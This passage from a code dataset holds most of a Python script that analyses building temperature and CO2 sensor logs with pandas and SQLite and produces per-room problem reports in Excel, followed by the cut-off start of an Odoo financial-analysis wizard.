##print(\"Start of x:\")\n ##print(x)\n if x['Temperature'] > temp_max:\n return True\n return False\n\n\ndef check_carbon(x):\n if x['CO2'] > co2_max:\n return True\n return False\n# End of function defs from Task II\n\n\nnew_data = df_test_copy.copy().reset_index()\nnew_data_copy = new_data.copy()\n\nnew_data_copy[\"Weekday\"] = new_data_copy[\"Timestamp\"].apply(lambda x: x.weekday())\nnew_data_copy.to_csv(\"basic_weekly.csv\")\n#co2_min = 350\n#fixed this placeholder value\n\n# These drops AREN'T necessary! We are replacing the tables at the start of the loop anyways\n# conn.cursor().execute(\"DROP TABLE TemperatureProblemsDatabase\")\n# conn.cursor().execute(\"DROP TABLE CarbonDioxideProblemsDatabase\")\n\nfiltered_log = pd.read_sql(\"TempAndCO2LogFiltered\", engine)\nfiltered_log.to_csv(\"weekly.csv\")\n\n# temporarily (0,1) --> should be (0, 5) or (0, # of days)\nfor i in range(0, 5):\n\n new_data = new_data_copy[new_data_copy[\"Weekday\"] == i]\n\n # Beginning of Section Modified from Task II\n\n # #print(\"\\nToo Cold: \\n\")\n temp_data = new_data[(new_data['Temperature'] < temp_min) | (new_data['Temperature'] > temp_max)]\n temp_data = temp_data[['Timestamp', 'Room #', 'Temperature', 'CO2']].sort_values(by=\"Temperature\", ascending=True)\n temp_data['High Temp?'] = temp_data.T.apply(check_temp)\n ##print(\"Temp Data\")\n ##print(i)\n ##print(temp_data)\n # temp_data.to_csv(\"tester.csv\")\n # random_testing_copy = temp_data.copy().reset_index()\n # for i in range(temp_data.size):\n # #print(random_testing_copy.loc[i])\n temp_data.to_sql(\"TemperatureProblemsDatabase\", conn, if_exists='replace') # should replace, because task three will run on one day of data at a time.\n\n # #print(\"\\nToo Much CO2: \\n\")\n print(new_data[[\"CO2\", \"Room #\"]])\n tmp = new_data[[\"CO2\", \"Room #\"]].set_index(\"Room #\")\n #print(tmp.loc[\"Outside Air AHU2 ZN-T\"])\n new_data[\"Min_CO2\"] = None\n\n def find_min_co2(row):\n tmstmp = row[\"Timestamp\"]\n df1 = new_data.where(new_data[\"Room #\"] == \"Outside Air\").dropna(how='all')\n df1 = df1.where(df1[\"Timestamp\"] == tmstmp).dropna(how='all')\n # print(df1)\n return df1[\"CO2\"].iloc[0]\n\n new_data[\"Min_CO2\"] = new_data.apply(find_min_co2, axis=1)\n print(new_data[\"Min_CO2\"])\n carbon_data = new_data[(new_data.CO2 > co2_max) | (new_data.CO2 < new_data.Min_CO2)][['Timestamp', 'Room #', 'Temperature', 'CO2']].sort_values(by='CO2')\n carbon_data['High Carbon?'] = carbon_data.T.apply(check_carbon)\n carbon_data.to_sql(\"CarbonDioxideProblemsDatabase\", conn, if_exists='replace') # should replace, because task three will run on one day of data at a time.\n # carbon_data.to_csv(\"weekly.csv\")\n\n # End of Section Modified from Task II\n\n # TODO: make a task 3 aggregation here.\n\n temp_data = pd.read_sql_table(\"TemperatureProblemsDatabase\", engine) # might need this into the other sql table directly... 
probably easiest\n temp_data = temp_data.sort_values(\"Room #\")\n temp_data.to_csv(SERVER_PATH + 'tester.csv')\n co2_data = pd.read_sql_table(\"CarbonDioxideProblemsDatabase\", engine)\n\n weekly_log = new_data.copy().reset_index().drop(\"level_0\", axis=1)\n\n # Convert times to integers so that they compare accurately\n\n for x in range(0, len(temp_data['Timestamp'])):\n temp_data['Timestamp'].loc[x] = (pd.to_datetime(temp_data['Timestamp'].loc[x]) - dt.timedelta(0))\n for x in range(0, len(co2_data['Timestamp'])):\n co2_data['Timestamp'].loc[x] = (pd.to_datetime(co2_data['Timestamp'].loc[x]) - dt.timedelta(0))\n for x in range(0, len(weekly_log['Timestamp'])):\n #print(weekly_log[\"Timestamp\"])\n weekly_log['Timestamp'].loc[x] = (pd.to_datetime(weekly_log['Timestamp'].loc[x]) - dt.timedelta(0))\n\n time_temp = temp_data.copy().set_index([\"Room #\", \"Temperature\"])\n time_co2 = co2_data.copy().set_index([\"Room #\", \"CO2\"])\n time_wkly_temp = weekly_log.copy().set_index([\"Room #\", \"Temperature\"])\n time_wkly_co2 = weekly_log.copy().set_index([\"Room #\", \"CO2\"])\n\n # Multi-index should identify a room and temp or co2 value uniquely for when we look for the times of h/l values\n\n td_copy = temp_data.set_index(\"Room #\").T\n cd_copy = co2_data.set_index(\"Room #\").T\n\n weekly_log['Highest Temperature'] = weekly_log['Temperature']\n weekly_log['Lowest Temperature'] = weekly_log['Temperature']\n weekly_log['Highest CO2'] = weekly_log['CO2']\n weekly_log['Lowest CO2'] = weekly_log['CO2']\n\n # Groups low/high #s\n\n weekly_log = weekly_log.groupby(\"Room #\").agg({'Lowest Temperature': np.min,\n 'Highest Temperature': np.max,\n 'Highest CO2': np.max,\n 'Lowest CO2': np.min})\n\n # weekly_log.to_csv(\"tester.csv\")\n\n all_data = pd.merge(temp_data, co2_data, how='outer', on=['Room #', \"Timestamp\", \"Temperature\", \"CO2\"]).drop(\"index_x\", axis=1).drop(\"index_y\", axis=1)\n # all_data.to_csv(\"tester.csv\")\n\n # Finds number of intervals with a given problem for each room\n\n weekly_log['Intervals Too Cold'] = None\n weekly_log['Intervals Too Warm'] = None\n weekly_log['Intervals Too Much CO2'] = None\n weekly_log['Intervals Too Little CO2'] = None\n\n for room in td_copy:\n #print(\"ROOM: \")\n #print(room)\n intervals_temp = td_copy[room].T\n intervals_temp['Intervals'] = None\n if type(intervals_temp) == pd.Series:\n intervals_temp = pd.DataFrame(intervals_temp).T\n intervals_temp = intervals_temp.groupby(\"High Temp?\").agg({\"Intervals\": np.size})\n #print(\"Temp Intervals: \")\n #print(intervals_temp)\n if len(intervals_temp) == 1:\n if intervals_temp.index[0] == 0:\n weekly_log['Intervals Too Cold'][room] = (intervals_temp.iloc[0])[0]\n else:\n weekly_log['Intervals Too Warm'][room] = (intervals_temp.iloc[0])[0]\n elif len(intervals_temp) == 2:\n weekly_log['Intervals Too Cold'][room] = (intervals_temp.iloc[0])[0]\n weekly_log['Intervals Too Warm'][room] = (intervals_temp.iloc[1])[0]\n\n for room in cd_copy:\n #print(\"ROOM: \")\n #print(room)\n intervals_co2 = cd_copy[room].T\n intervals_co2['Intervals'] = None\n if type(intervals_co2) == pd.Series:\n intervals_co2 = pd.DataFrame(intervals_co2).T\n intervals_co2 = intervals_co2.groupby(\"High Carbon?\").agg({\"Intervals\": np.size})\n #print(\"CO2 Intervals: \")\n #print(intervals_co2)\n if len(intervals_co2) == 1:\n if intervals_co2.index[0] == 0:\n weekly_log['Intervals Too Little CO2'][room] = (intervals_co2.iloc[0])[0]\n else:\n weekly_log['Intervals Too Much CO2'][room] = (intervals_co2.iloc[0])[0]\n elif 
len(intervals_co2) == 2:\n weekly_log['Intervals Too Little CO2'][room] = (intervals_co2.iloc[0])[0]\n weekly_log['Intervals Too Much CO2'][room] = (intervals_co2.iloc[1])[0]\n\n # go back into time database (copied from original database) and locate timestamps\n\n weekly_log['First Time Too Cold'] = None\n weekly_log['First Time Too Warm'] = None\n weekly_log['Last Time Too Cold'] = None\n weekly_log['Last Time Too Warm'] = None\n\n for room in time_temp.index:\n room_number = room[0]\n temp_df = time_temp.loc[room_number]\n temp_df['First Time'] = temp_df['Timestamp']\n temp_df['Last Time'] = temp_df['Timestamp']\n temp_df = temp_df.groupby(\"High Temp?\").agg({\"First Time\": np.min, \"Last Time\": np.max})\n early_times = temp_df['First Time']\n if len(early_times) == 1:\n if early_times.index[0] == 0:\n weekly_log['First Time Too Cold'][room_number] = early_times.iloc[0]\n else:\n weekly_log['First Time Too Warm'][room_number] = early_times.iloc[0]\n elif len(early_times) == 2:\n #print(early_times)\n weekly_log['First Time Too Cold'][room_number] = early_times.iloc[0]\n weekly_log['First Time Too Warm'][room_number] = early_times.iloc[1]\n # make sure data is sorted before this happens!!! I think it is sorted because of the groupby\n late_times = temp_df['Last Time']\n if len(late_times) == 1:\n if late_times.index[0] == 0:\n weekly_log['Last Time Too Cold'][room_number] = late_times.iloc[0]\n else:\n weekly_log['Last Time Too Warm'][room_number] = late_times.iloc[0]\n elif len(late_times) == 2:\n #print(late_times)\n weekly_log['Last Time Too Cold'][room_number] = late_times[0]\n weekly_log['Last Time Too Warm'][room_number] = late_times[1]\n # make sure data is sorted before this happens!!! I think it is sorted because of the groupby\n\n weekly_log['Time of Lowest Temperature'] = None\n weekly_log['Time of Highest Temperature'] = None\n weekly_log['Time of Highest CO2'] = None\n weekly_log['Time of Lowest CO2'] = None\n temp_data['Time of Lowest Temperature'] = None\n temp_data['Time of Highest Temperature'] = None\n co2_data['Time of Lowest CO2'] = None\n co2_data['Time of Highest CO2'] = None\n\n\n def convert_datetime(z):\n if type(z) == str:\n return z\n elif type(z) == pd.Timestamp:\n #print(type(datetime.strftime(z.to_pydatetime(), '%Y-%m-%d %H:%M:%S')))\n return datetime.strftime(z.to_pydatetime(), '%Y-%m-%d %H:%M:%S')\n\n\n # finds times of high/low temps on a daily basis... 
this isn't actually used in the final report but it might be good information to have\n\n for room in time_wkly_temp.index:\n low_temps = time_wkly_temp.loc[room[0]].loc[weekly_log['Lowest Temperature'][room[0]]]['Timestamp']\n high_temps = time_wkly_temp.loc[room[0]].loc[weekly_log['Highest Temperature'][room[0]]]['Timestamp']\n if type(low_temps) == pd.Series:\n weekly_log['Time of Lowest Temperature'][room[0]] = convert_datetime(low_temps.iloc[0])\n else:\n weekly_log['Time of Lowest Temperature'][room[0]] = convert_datetime(low_temps)\n if type(high_temps) == pd.Series:\n weekly_log['Time of Highest Temperature'][room[0]] = convert_datetime(high_temps.iloc[0])\n else:\n weekly_log['Time of Highest Temperature'][room[0]] = convert_datetime(high_temps)\n temp_data['Time of Lowest Temperature'][room[0]] = weekly_log['Time of Lowest Temperature'][room[0]]\n temp_data['Time of Highest Temperature'][room[0]] = weekly_log['Time of Highest Temperature'][room[0]]\n\n for room in time_wkly_co2.index:\n low_co2 = time_wkly_co2.loc[room[0]].loc[weekly_log['Lowest CO2'][room[0]]]['Timestamp']\n high_co2 = time_wkly_co2.loc[room[0]].loc[weekly_log['Highest CO2'][room[0]]]['Timestamp']\n if type(low_co2) == pd.Series:\n weekly_log['Time of Lowest CO2'][room[0]] = convert_datetime(low_co2.iloc[0])\n else:\n weekly_log['Time of Lowest CO2'][room[0]] = convert_datetime(low_co2)\n if type(high_co2) == pd.Series:\n weekly_log['Time of Highest CO2'][room[0]] = convert_datetime(high_co2.iloc[0])\n else:\n weekly_log['Time of Highest CO2'][room[0]] = convert_datetime(high_co2)\n co2_data['Time of Lowest CO2'][room[0]] = weekly_log['Time of Lowest CO2'][room[0]]\n co2_data['Time of Highest CO2'][room[0]] = weekly_log['Time of Highest CO2'][room[0]]\n\n #weekly_log = pd.merge(all_data, weekly_log, how='outer', on=['Room #'])\n\n # Converts to string so SQL can handle it\n for x in range(0, len(weekly_log['First Time Too Cold'])):\n weekly_log['First Time Too Cold'].iloc[x] = convert_datetime(weekly_log['First Time Too Cold'].iloc[x])\n weekly_log['Last Time Too Cold'].iloc[x] = convert_datetime(weekly_log['Last Time Too Cold'].iloc[x])\n weekly_log['First Time Too Warm'].iloc[x] = convert_datetime(weekly_log['First Time Too Warm'].iloc[x])\n weekly_log['Last Time Too Warm'].iloc[x] = convert_datetime(weekly_log['Last Time Too Warm'].iloc[x])\n\n for x in range(0, len(time_wkly_temp['Timestamp'])):\n time_wkly_temp['Timestamp'].iloc[x] = convert_datetime(time_wkly_temp['Timestamp'].iloc[x])\n\n for x in range(0, len(time_wkly_co2['Timestamp'])):\n time_wkly_co2['Timestamp'].iloc[x] = convert_datetime(time_wkly_co2['Timestamp'].iloc[x])\n\n time_wkly_temp = time_wkly_temp.reset_index()\n time_wkly_co2 = time_wkly_co2.reset_index()\n time_wkly_temp = time_wkly_temp.sort_values('Room #')\n time_wkly_co2 = time_wkly_co2.sort_values('Room #')\n # all_data.to_csv(\"tester.csv\")\n\n #time_wkly_temp.to_csv(\"tester.csv\")\n\n # Connect to databases\n\n conn = sqlite3.connect(SERVER_PATH + PATH)\n all_data.to_sql(\"FilteredT3Database\", conn, if_exists='append')\n time_wkly_temp.to_sql(\"DailyTempDatabase\", conn, if_exists='append')\n #print(time_wkly_temp)\n time_wkly_co2.to_sql(\"DailyCarbonDatabase\", conn, if_exists='append')\n weekly_log.to_sql(\"DailyDatabase\", conn, if_exists='append')\n\n # Drops aren't necessary:\n # TemperatureProblems and CarbonDioxideProblems DBs are \"replaced\" at the start of the loop\n # Daily Log is reset to a copy of \"new_data\" at the start of the loop\n #print(\"Daily 
Problems\")\n\n# sql_temp_test = pd.read_sql(\"TemperatureProblemsDatabase\", engine)\n# sql_co2_test = pd.read_sql(\"CarbonDioxideProblemsDatabase\", engine)\n# sql_co2_test.to_csv(\"weekly.csv\")\n\n# TODO: run task 4 on aggregation of daily problem reports\n\ndaily_data = pd.read_sql_table(\"DailyDatabase\", engine)\ndaily_data['Days With Problems'] = None\nall_temps = pd.read_sql_table(\"DailyTempDatabase\", engine)\nall_carbon = pd.read_sql_table(\"DailyCarbonDatabase\", engine)\ndays_with_problems = pd.read_sql_table(\"FilteredT3Database\", engine)\ndays_with_problems = days_with_problems.drop(\"index\", axis=1)\ndays_with_problems['Day'] = days_with_problems['Timestamp'].apply(lambda z: datetime.strftime(z, \"%Y-%m-%d\"))#kept as a string for now just to avoid automatic time assignment\ndays_with_problems = days_with_problems.set_index([\"Room #\", \"Day\"])\ndays_with_problems[\"Days With Problems\"] = None\ndays_with_problems = days_with_problems.groupby(level=[0, 1]).agg({\"Days With Problems\": np.size})\ndays_with_problems = days_with_problems.groupby(level=0).agg({\"Days With Problems\": np.size})\ndays_with_problems.to_csv(\"ahs_cold_data.csv\")\n\nall_temps_copy = all_temps.set_index(['Room #', 'Temperature'])\nall_carbon_copy = all_carbon.set_index(['Room #', 'CO2'])\n\n\ndef convert_back(z):\n if z == \"N/A\":\n return np.NaN\n elif z is not None:\n return datetime.strptime(z, \"%Y-%m-%d %H:%M:%S\").timestamp()\n else:\n return None\n\n\nfor x in range(0, len(daily_data['First Time Too Cold'])):\n daily_data['First Time Too Cold'].loc[x] = convert_back(daily_data['First Time Too Cold'].loc[x])\n daily_data['Last Time Too Cold'].loc[x] = convert_back(daily_data['Last Time Too Cold'].loc[x])\n daily_data['First Time Too Warm'].loc[x] = convert_back(daily_data['First Time Too Warm'].loc[x])\n daily_data['Last Time Too Warm'].loc[x] = convert_back(daily_data['Last Time Too Warm'].loc[x])\n\n#print(daily_data['Last Time Too Cold'])\n\n\ndef none_to_nan(x):\n if x is None:\n return np.NaN\n return x\n\n\nall_temps['Temperature'] = all_temps['Temperature'].apply(none_to_nan)\nall_carbon['CO2'] = all_carbon['CO2'].apply(none_to_nan)\n\nall_temps['Median Temperature'] = all_temps['Temperature']\nall_temps['Mean Temperature'] = all_temps['Temperature']\ntemp_analysis = all_temps.groupby(\"Room #\").agg({\"Mean Temperature\": np.nanmean,\n \"Median Temperature\": np.nanmedian})\n\nall_carbon['Median CO2'] = all_carbon['CO2']\nall_carbon['Mean CO2'] = all_carbon['CO2']\nco2_analysis = all_carbon.groupby(\"Room #\").agg({\"Mean CO2\": np.mean,\n \"Median CO2\": np.median})\n\n# for some reason, sql was automatically converting all the interval values to bytes... 
but this reverses it\n\n\ndef convert_to_int(x):\n if x is not None:\n return int.from_bytes(x, sys.byteorder)\n return None\n\n\ndaily_data['Intervals Too Warm'] = daily_data['Intervals Too Warm'].apply(convert_to_int)\ndaily_data['Intervals Too Cold'] = daily_data['Intervals Too Cold'].apply(convert_to_int)\ndaily_data['Intervals Too Much CO2'] = daily_data['Intervals Too Much CO2'].apply(convert_to_int)\ndaily_data['Intervals Too Little CO2'] = daily_data['Intervals Too Little CO2'].apply(convert_to_int)\n\n#print(daily_data['First Time Too Cold'])\n#print(daily_data['Last Time Too Cold'])\n\n#print(daily_data.where(daily_data[\"Room #\"] == \"Mars\"))\n\n#days_with_problems = days_with_problems.groupby(\"\")\n\ndaily_data = daily_data.groupby(\"Room #\")\n\ndaily_data = daily_data.agg({\"Intervals Too Warm\": np.sum,\n \"Intervals Too Cold\": np.sum,\n \"Intervals Too Much CO2\": np.sum,\n \"Intervals Too Little CO2\": np.sum,\n \"Highest Temperature\": np.max,\n \"Lowest Temperature\": np.min,\n 'Highest CO2': np.max,\n 'Lowest CO2': np.min,\n \"First Time Too Warm\": np.min,\n \"Last Time Too Warm\": np.max,\n \"First Time Too Cold\": np.min,\n \"Last Time Too Cold\": np.max})\ndaily_data = pd.merge(daily_data, days_with_problems, how='outer', on=['Room #'])\n\ndaily_data['Time of Highest Temperature'] = None\ndaily_data['Time of Lowest Temperature'] = None\ndaily_data['Time of Highest CO2'] = None\ndaily_data['Time of Lowest CO2'] = None\n\n# For each room, goes back into the copies to find the times of the most extreme values\nfor room in daily_data.index:\n if not np.isnan(daily_data['Highest Temperature'][room]):\n # match highest temp to time at which it occurred\n index_tuple = (room, daily_data['Highest Temperature'][room]) # removed cast to int...\n if type(all_temps_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_temps_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Highest Temperature'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Highest Temperature'][room] = all_temps_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Lowest Temperature'][room]):\n # match lowest temp to time at which it occurred\n index_tuple = (room, int(daily_data['Lowest Temperature'][room]))\n if type(all_temps_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_temps_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Lowest Temperature'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Lowest Temperature'][room] = all_temps_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Highest CO2'][room]):\n # match highest co2 to time at which it occurred\n index_tuple = (room, int(daily_data['Highest CO2'][room]))\n if type(all_carbon_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_carbon_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Highest CO2'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Highest CO2'][room] = all_carbon_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Lowest CO2'][room]):\n # match lowest co2 to time at which it occurred\n index_tuple = (room, int(daily_data['Lowest CO2'][room]))\n if type(all_carbon_copy.loc[index_tuple]) == pd.Series:\n temp_df 
=(pd.DataFrame(all_carbon_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Lowest CO2'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Lowest CO2'][room] = all_carbon_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n\n\ndef make_time_readable(x):\n if (x is not None) and (not np.isnan(x)):\n return datetime.fromtimestamp(x)\n return None\n\n\ndaily_data[\"First Time Too Warm\"] = daily_data[\"First Time Too Warm\"].apply(make_time_readable)\ndaily_data[\"Last Time Too Warm\"] = daily_data[\"Last Time Too Warm\"].apply(make_time_readable)\ndaily_data[\"First Time Too Cold\"] = daily_data[\"First Time Too Cold\"].apply(make_time_readable)\ndaily_data[\"Last Time Too Cold\"] = daily_data[\"Last Time Too Cold\"].apply(make_time_readable)\n\ndaily_data = pd.merge(daily_data, temp_analysis, how='outer', on=['Room #'])\ndaily_data = pd.merge(daily_data, co2_analysis, how='outer', on=['Room #'])\n\ndaily_data.to_excel(\"output.xlsx\")\n# daily_data.to_csv('tester.csv')\n\n# NOTE: The old data that was in the Weekly Log table is saved in a table called OldWeeklyLog, fittingly.\n# Clearing weekly files\n\ncursor = conn.cursor()\ndrop1 = \"DROP TABLE DailyTempDatabase\"\ndrop2 = \"DROP TABLE DailyCarbonDatabase\"\ndrop3 = \"DROP TABLE DailyDatabase\"\ndrop4 = \"DROP TABLE FilteredT3Database\"\ncursor.execute(drop1)\ncursor.execute(drop2)\ncursor.execute(drop3)\ncursor.execute(drop4)\n\n\n# Task 4.5 -- creating the 4 more consolidated sheets\n# UPDATE: in the new branch, this task will also separate rooms with sensor issues into their own spreadsheets\n\noriginal_file = pd.read_excel(\"output.xlsx\")\n#original_file.to_csv(\"tester.csv\")\noriginal_file['Likely Sensor Issue?'] = None\noriginal_file[\"CO2 Sensor Issue?\"] = None\noriginal_file[\"Temperature Sensor Issue?\"] = None\n# Too little CO2 should probably be combined with this...\nfor x in range(0, len(original_file[\"Days With Problems\"])):\n original_file[\"Likely Sensor Issue?\"].iloc[x] = original_file[\"Intervals Too Cold\"].iloc[x] > 160 or original_file['Intervals Too Warm'].iloc[x] > 160 or original_file[\"Intervals Too Much CO2\"].iloc[x] > 160 or original_file[\"Lowest Temperature\"].iloc[x] == original_file[\"Highest Temperature\"].iloc[x] or original_file[\"Lowest CO2\"].iloc[x] == original_file[\"Highest CO2\"].iloc[x] or original_file[\"Intervals Too Little CO2\"].iloc[x] > 0\n original_file[\"CO2 Sensor Issue?\"].iloc[x] = original_file[\"Lowest CO2\"].iloc[x] == original_file[\"Highest CO2\"].iloc[x] or original_file[\"Intervals Too Little CO2\"].iloc[x] > 0\n # original_file[\"Intervals Too Much CO2\"].iloc[x] > 160 or\n original_file[\"Temperature Sensor Issue?\"].iloc[x] = original_file[\"Intervals Too Cold\"].iloc[x] > 160 or original_file['Intervals Too Warm'].iloc[x] > 160 or original_file[\"Lowest Temperature\"].iloc[x] == original_file[\"Highest Temperature\"].iloc[x]\n\n\n# Cold Values\ncold_values = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Cold\", \"Lowest Temperature\", \"Highest Temperature\", \"Mean Temperature\", \"Median Temperature\", \"First Time Too Cold\", \"Last Time Too Cold\", \"Time of Highest Temperature\", \"Time of Lowest Temperature\", \"Likely Sensor Issue?\", \"Temperature Sensor Issue?\"]]\ncold_values = cold_values[cold_values['Intervals Too Cold'] > 0]\ncold_values = cold_values[cold_values[\"Temperature Sensor Issue?\"] == False]\ncold_values = cold_values.sort_values(by=\"Intervals Too 
Cold\", ascending=False)\nfor x in range(0, len(cold_values['Median Temperature'])):\n cold_values['Median Temperature'].iloc[x] = int(cold_values['Median Temperature'].iloc[x])\n cold_values['Mean Temperature'].iloc[x] = int(cold_values['Mean Temperature'].iloc[x])\n for category in ['Time of Highest Temperature', 'Time of Lowest Temperature', \"First Time Too Cold\", \"Last Time Too Cold\"]:\n if type(cold_values[category].iloc[x]) == str:\n temp_time = datetime.strptime(cold_values[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(cold_values[category].iloc[x] == pd.Timestamp):\n temp_time = cold_values[category].iloc[x]\n cold_values[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n#cold_values.to_csv(\"tester.csv\")\ncold_values.to_excel(\"cold.xlsx\")\n\n# Warm Values\nwarm_values = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Warm\", \"Lowest Temperature\", \"Highest Temperature\", \"Mean Temperature\", \"Median Temperature\", \"First Time Too Warm\", \"Last Time Too Warm\", \"Time of Highest Temperature\", \"Time of Lowest Temperature\", \"Likely Sensor Issue?\", \"Temperature Sensor Issue?\"]]\nwarm_values = warm_values[warm_values['Intervals Too Warm'] > 0]\nwarm_values = warm_values[warm_values[\"Temperature Sensor Issue?\"] == False]\nwarm_values = warm_values.sort_values(by=\"Intervals Too Warm\", ascending=False)\nfor x in range(0, len(warm_values['Median Temperature'])):\n warm_values['Median Temperature'].iloc[x] = int(warm_values['Median Temperature'].iloc[x])\n warm_values['Mean Temperature'].iloc[x] = int(warm_values['Mean Temperature'].iloc[x])\n for category in ['Time of Highest Temperature', 'Time of Lowest Temperature', \"First Time Too Warm\", \"Last Time Too Warm\"]:\n if type(warm_values[category].iloc[x]) == str:\n temp_time = datetime.strptime(warm_values[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(warm_values[category].iloc[x] == pd.Timestamp):\n temp_time = warm_values[category].iloc[x]\n warm_values[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\nwarm_values.to_csv(\"weekly.csv\")\nwarm_values.to_excel(\"warm.xlsx\")\n\n# High CO2 Values\nhigh_co2 = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Much CO2\", \"Lowest CO2\", \"Highest CO2\", \"Mean CO2\", \"Median CO2\", \"Time of Highest CO2\", \"Time of Lowest CO2\", \"Likely Sensor Issue?\", \"CO2 Sensor Issue?\"]]\nhigh_co2 = high_co2[high_co2['Intervals Too Much CO2'] > 0]\nhigh_co2 = high_co2[high_co2[\"CO2 Sensor Issue?\"] == False]\nhigh_co2 = high_co2.sort_values(by=\"Intervals Too Much CO2\", ascending=False)\nfor x in range(0, len(high_co2['Median CO2'])):\n high_co2['Median CO2'].iloc[x] = int(high_co2['Median CO2'].iloc[x])\n high_co2['Mean CO2'].iloc[x] = int(high_co2['Mean CO2'].iloc[x])\n for category in ['Time of Highest CO2', 'Time of Lowest CO2']:\n if type(high_co2[category].iloc[x]) == str:\n temp_time = datetime.strptime(high_co2[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(high_co2[category].iloc[x] == pd.Timestamp):\n temp_time = high_co2[category].iloc[x]\n high_co2[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n#high_co2.to_csv(\"basic_weekly.csv\")\nhigh_co2.to_excel(\"high_co2.xlsx\")\n\n# SENSOR ISSUE (incl. 
low co2)\nlow_co2 = original_file[[\"Room #\", \"Intervals Too Warm\", \"Intervals Too Cold\", \"Intervals Too Much CO2\", \"Intervals Too Little CO2\", \"Lowest CO2\", \"Highest CO2\", \"Lowest Temperature\", \"Highest Temperature\", \"Likely Sensor Issue?\", \"CO2 Sensor Issue?\", \"Temperature Sensor Issue?\"]]\nlow_co2 = low_co2[low_co2[\"Likely Sensor Issue?\"] == True]\nlow_co2 = low_co2.sort_values(by=\"Intervals Too Little CO2\", ascending=False)\n#for x in range(0, len(low_co2['Intervals Too Warm'])):\n # low_co2['Median CO2'].iloc[x] = int(low_co2['Median CO2'].iloc[x])\n # low_co2['Mean CO2'].iloc[x] = int(low_co2['Mean CO2'].iloc[x])\n # low_co2['Median Temperature'].iloc[x] = int(low_co2['Median Temperature'].iloc[x])\n # low_co2['Mean Temperature'].iloc[x] = int(low_co2['Mean Temperature'].iloc[x])\n #for category in ['Time of Highest CO2', 'Time of Lowest CO2', 'Time of Highest Temperature', 'Time of Lowest Temperature', 'First Time Too Cold', 'Last Time Too Cold', 'First Time Too Warm', 'Last Time Too Warm']:\n #if type(low_co2[category].iloc[x]) == str:\n #temp_time = datetime.strptime(low_co2[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n #elif type(low_co2[category].iloc[x] == pd.Timestamp):\n #temp_time = low_co2[category].iloc[x]\n #try:\n #low_co2[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n #except ValueError:\n #low_co2[category].iloc[x] = None\nlow_co2.to_csv(\"ahs_carbon_data.csv\")\nlow_co2.to_excel(\"low_co2.xlsx\")\n\n","sub_path":"generate_historical_report.py","file_name":"generate_historical_report.py","file_ext":"py","file_size_in_byte":31376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"185598760","text":"# -*- coding: utf-8 -*-\n\nimport calendar\nfrom datetime import date, datetime\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DF\n\nMONTHS = [\n ('01', 'January'), ('02', 'February'), ('03', 'March'),\n ('04', 'April'), ('05', 'May'), ('06', 'June'),\n ('07', 'July'), ('08', 'August'), ('09', 'September'),\n ('10', 'October'), ('11', 'November'), ('12', 'December')]\n\n\nclass FinancialAnalysis(models.TransientModel):\n _name = 'financial.analysis'\n _description = 'Financial Analysis'\n\n @api.model\n def _get_year(self):\n years = []\n curr_year = date.today().year\n for year in range(curr_year - 10, curr_year + 1):\n years.append((str(year), str(year)))\n return years\n\n @api.model\n def _get_months(self):\n return MONTHS\n\n from_year = fields.Selection(\n string='From year',\n required=True,\n selection='_get_year'\n )\n from_month = fields.Selection(\n string='From month',\n required=True,\n selection='_get_months'\n )\n to_year = fields.Selection(\n string=\"To year\",\n required=True,\n selection='_get_year'\n )\n to_month = fields.Selection(\n string='To month',\n required=True,\n selection='_get_months')\n result = fields.Html(string='Result', readonly=True)\n\n @api.constrains('from_year', 'from_month', 'to_month', 'to_year')\n def _check_duration(self):\n for record in self:\n if record.from_year > record.to_year:\n raise UserError('From year must be less than To year')\n elif record.from_year == record.to_year and\\\n record.from_month > record.to_month:\n raise UserError('From month must be less than To month')\n\n @api.multi\n def button_view_analytics_result(self):\n \"\"\"\n TO DO:\n - Button to render report\n \"\"\"\n html = self.env['report'].get_html(\n self.id, 
